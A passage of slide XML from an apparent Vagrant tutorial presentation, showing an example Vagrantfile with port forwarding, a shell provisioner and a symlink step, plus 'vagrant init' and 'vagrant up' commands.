              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>ln -fs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>/vagrant/www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spc="-15" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>/var/www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300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="125499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="990"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Remember: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>To make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>things </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>smoothly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>design </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>provisioner </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>expect no </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user-input.  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-125" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Tip: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tired </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>being </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bashed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time? </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>several </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>providers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>there (e.g. chef, puppet,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ansible, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>...) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to fix </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>up </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>no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-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time.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pc="-55" dirty="0"/>
              <a:t>19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122" y="190436"/>
            <a:ext cx="9036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>
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/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221355" y="1638680"/>
            <a:ext cx="284480" cy="389255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="185674" y="92837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178378" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="7295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="27192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="56701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7295" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27192" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56701" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92837" y="185674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128972" y="178378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158481" y="158481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178378" y="128972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185674" y="92837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="284479" h="389255">
                <a:moveTo>
                  <a:pt x="284226" y="296291"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276930" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="203454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="210749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="230646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="260155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98552" y="296291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105847" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125744" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155253" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191389" y="389128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227524" y="381832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257033" y="361935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276930" y="332426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284226" y="296291"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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36019" y="2042956"/>
            <a:ext cx="193732" cy="193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324" y="2462439"/>
            <a:ext cx="191954" cy="1919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8589" y="699201"/>
            <a:ext cx="3931920" cy="194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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrantfile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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1866264">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrantile  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>Vagrant.conigure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”2”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>|conig|</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10477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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”ubuntu/trusty64”</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.synced_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”v-root”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”/vagrant” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="104775" marR="5080">
              <a:lnSpc>
                <a:spcPct val="121300"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.provision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:shell, path: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>”bootstrap.sh” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>:forwarded_port, guest: 80, host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>3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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="LM Roman 10"/>
              <a:cs typeface="LM Roman 10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>forward </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>guest- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on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20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>host-system.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pc="-55" dirty="0"/>
              <a:t>20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589" y="190436"/>
            <a:ext cx="3353435" cy="1242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sz="1200" spc="-204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1200" spc="-125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EXAMPLE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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Going</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Live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LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t> up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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>www-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="5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http://localhost:8080/html/index.html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2585" y="1547271"/>
            <a:ext cx="2142667" cy="13432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pc="-55" dirty="0"/>
              <a:t>21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589" y="190436"/>
            <a:ext cx="4323715" cy="2716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sz="1200" spc="-150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INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-225" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185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DOWNLOAD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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Up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LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init debian/jessie64 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&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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up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5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>machine 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’default’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>up with 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’virtualbox’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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provider...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
